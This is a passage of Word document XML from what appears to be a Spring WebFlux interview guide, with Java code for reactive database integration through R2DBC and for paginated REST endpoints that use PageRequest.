          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A4C12F"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4393FD4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ItemRepository itemRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6807B3" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74FC2A6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Flux&lt;Item&gt; getAllItems() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F2A89A"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Repository.findAll();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603ADC02"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4D171E2E" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AEDA24E"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Item&gt; getItemById(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59784AC6"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Repository.findById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D96FDC"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA53446" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D323E3"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Item&gt; createItem(Item item) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2914C017"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Repository.save(item);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C19F95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2B7E4C6D"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2746CDB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reate a Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624D957A"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xpose REST endpoints using a reactive controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556C6088"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C01ADF"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web.bind.annotation.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D3B23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Mono;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696862E2"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Flux;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A66AD1" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F5CB149"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020A23CD"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questMapping("/api/items")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0C20A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Controller {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4C79F7" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76EFA90E"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6335845B"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ItemService itemService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17238415" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="488ED81E"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etMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B05E379"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Item&gt; getItemById(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF4540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Service.getItemById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074762F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58AB49FB" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E42163F"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etMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085C5697"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Flux&lt;Item&gt; getAllItems() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5972A15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Service.getAllItems();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA37EB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243FECBF" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="436A27D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ostMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A863AE4"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Item&gt; createItem(@RequestBody Item item) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8E1EFB"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Service.createItem(item);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6947817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773D81FF"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0DB10B73"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un the Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C10FF56"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un the Spring Boot application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132067CD"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vnw spring-boot:run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3AE9FB"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Your Spring WebFlux application is now connected to an R2DBC-supported relational database (like PostgreSQL or H2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382F191A" w14:textId="77777777" w:rsidR="00C201B0"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780EFF9">
          <v:rect id="_x0000_i2324" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E2C8E6" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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onclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7441D9D9"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tegrating a reactive database (whether MongoDB or R2DBC) into a Spring WebFlux application is straightforward. Both MongoDB (using Spring Data MongoDB) and R2DBC (for relational databases) provide reactive database connectivity, ensuring non-blocking, scalable, and efficient data operations. By following the steps above, you can build a fully reactive web application that connects to either a NoSQL or SQL database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9D2B5F"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9590389">
          <v:rect id="_x0000_i2325" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7495B19A" w14:textId="53DCA6E0"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24" w:name="_Toc196308004"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How would you implement pagination in a reactive Spring WebFlux application</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="524"/>
    </w:p>
    <w:p w14:paraId="203E80B3" w14:textId="297B71F6" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0"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lementing pagination in a reactive Spring WebFlux application involves using the reactive database APIs like ReactiveCrudRepository or ReactiveMongoRepository in conjunction with reactive programming techniques such as Mono and Flux. The idea is to fetch a specific subset (page) of results without loading all records into memory, providing a non-blocking and scalable solution for large datasets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DC2347"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Here’s how you can implement pagination in a reactive Spring WebFlux application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504222E0" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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Steps to Implement Pagination in a Reactive Spring WebFlux Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1440BB2D" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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 Add Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125971FC"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Ensure you have the required dependencies for Spring WebFlux and your reactive database (e.g., MongoDB or R2DBC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7692B6"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For example, using </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MongoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE7128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t;dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABDB628"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4B01E776"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231965EC"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artifactId&gt;spring-boot-starter-webflux&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2067D039"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49ABEB1B"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636740D3"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2ECC93"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artifactId&gt;spring-boot-starter-data-mongodb-reactive&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6AE8CA"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2971488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t;/dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F73C66"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Or, if you're using </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>R2DBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Reactive Relational Database):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD5167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t;dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CB54A8"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547B75D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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F63A307"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artifactId&gt;spring-boot-starter-webflux&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C71FDB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4C1E20FA"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3AE40112"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groupId&gt;org.springframework.data&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5809D8BE"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artifactId&gt;spring-data-r2dbc&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCCDCA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2A38934F"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5778057B"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groupId&gt;io.r2dbc&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327719F9"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artifactId&gt;r2dbc-postgresql&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2C3A94"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D0006E"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t;/dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AD4C6F" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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2. Create a Domain Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5A1B4F"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Define the domain model that you want to paginate. For example, a simple Item model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD68F8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annotation.Id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4BE742"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mongodb.core.mapping.Document;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F3ACF0" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="543E447C"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Document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D625F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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797B0AD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d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005B7DB3"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String id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F1FA4B"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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1BE6E9"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double price;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7674CD" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E6BB59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Getters and Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45212E07"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24EF9EC8" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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3. Create a Repository with Pagination Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AB2923"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f you're using </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MongoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, extend ReactiveMongoRepository and use Pageable to support pagination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C55EC53"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For </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MongoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2757E00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domain.PageRequest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71395483"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mongodb.repository.ReactiveMongoRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6C10BD"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Flux;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCAF2E9" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D59CBA"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interface ItemRepository extends ReactiveMongoRepository&lt;Item, String&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EA5B5E"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Flux&lt;Item&gt; findAllBy(PageRequest pageRequest);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C0102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503843F7"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f you're using </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>R2DBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, extend ReactiveCrudRepository and use Pageable (or a custom query).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1994437C"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For </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>R2DBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ED9CF9"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repository.reactive.ReactiveCrudRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ABEDC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domain.PageRequest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCCAACD"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import reactor.core.publisher.Flux;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C16252" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76E5DA8C"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interface ItemRepository extends ReactiveCrudRepository&lt;Item, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFE293D"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Flux&lt;Item&gt; findAllBy(PageRequest pageRequest);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3380F71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7593A616" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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4. Service Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C57827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the service layer, define methods to retrieve paginated data by accepting parameters like page and size. Convert these into a PageRequest object for pagination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04340AFC"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B962888"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domain.PageRequest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9DD21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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03913FF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Flux;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764F42B0" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59BE4BFA"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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7475A157"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Service {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBB798B" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3632BBEA"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535FC17F"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ItemRepository itemRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8EF58A" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="566E5EC9"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Flux&lt;Item&gt; getItemsByPage(int page, int size) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633732F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ageRequest pageRequest = PageRequest.of(page, size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AA0CEF"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Repository.findAllBy(pageRequest);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BF0E4F"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0994AC3E"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27A07B33" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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5. Controller Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A3219A"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the controller, accept pagination parameters (page, size) from the request and pass them to the service layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574CF52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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E64A0D8"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web.bind.annotation.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357B5E9A"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Flux;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E91582" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00EAF4B9"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BAFE2D"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questMapping("/api/items")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B5DB3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Controller {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA6B9BF" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5630B126"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2508D3B3"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ItemService itemService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAE4C26" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FAC2AA4"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etMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AECB17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Flux&lt;Item&gt; getItems(@RequestParam(defaultValue = "0") int page,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15600A0E"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questParam(defaultValue = "10") int size) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206E7203"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Service.getItemsByPage(page, size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48189609"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7240B2E7"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371C4DBE" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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6. Testing the Pagination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DF3562"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You can now test pagination by calling the REST API with page and size parameters. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350FD5C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GET /api/items?page=0&amp;size=10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B882F32"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is request will fetch the first page of 10 items.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72876215" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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 of Pagination Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECAC66D"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f you want to return specific fields along with pagination details (like total number of pages), you can create a custom response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542B14BE" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B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ustom Pagination Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C7B25D"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PagedResponse&lt;T&gt; {</w:t>
      </w:r>
    </w:p>
